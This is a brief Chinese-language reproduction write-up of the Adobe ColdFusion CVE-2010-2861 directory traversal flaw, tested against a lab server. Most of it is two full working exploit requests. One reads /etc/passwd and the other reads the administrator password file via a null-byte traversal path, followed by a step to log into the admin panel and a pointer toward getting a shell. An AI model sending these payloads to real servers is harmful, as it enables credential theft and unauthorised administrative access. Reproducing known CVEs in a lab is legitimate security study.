Adobe ColdFusion CVE-2010-2861 任意文件讀取漏洞復現

0. 漏洞介紹

Adobe ColdFusion 8、9版本中存在一處目錄穿越漏洞，可導致未授權的用戶讀取服務器任意文件。

1. 漏洞影響

Adobe ColdFusion 8
Adobe ColdFusion 9

2. 漏洞復現

0. 嘗試讀取/etc/passwd:

GET /CFIDE/administrator/enter.cfm?locale=enter.cfm?locale=../../../../../../../../../etc/passwd%00en HTTP/1.1
Host: 192.168.163.128:8500
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1
Sec-GPC: 1
Cache-Control: max-age=0

1. 嘗試讀取后臺密碼：

GET /CFIDE/administrator/enter.cfm?locale=enter.cfm?locale=../../../../../../../lib/password.properties%00en HTTP/1.1
Host: 192.168.163.128:8500
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1
Sec-GPC: 1
Cache-Control: max-age=0

解碼：

2. 進入后臺。

總結

Adobe ColdFusion漏洞較多，該目錄穿越漏洞除了獲取敏感信息外，更多的是用來獲取后臺密碼，進入后臺，畢竟這個ColdFusion是一個動態的動態Web服務器；如果想要利用該漏洞獲取shell，可以看看這篇博客https://www.vuln.cn/6118，ColdFusion漏洞比較多，這里就不復現反彈shell了，以后有時間在做。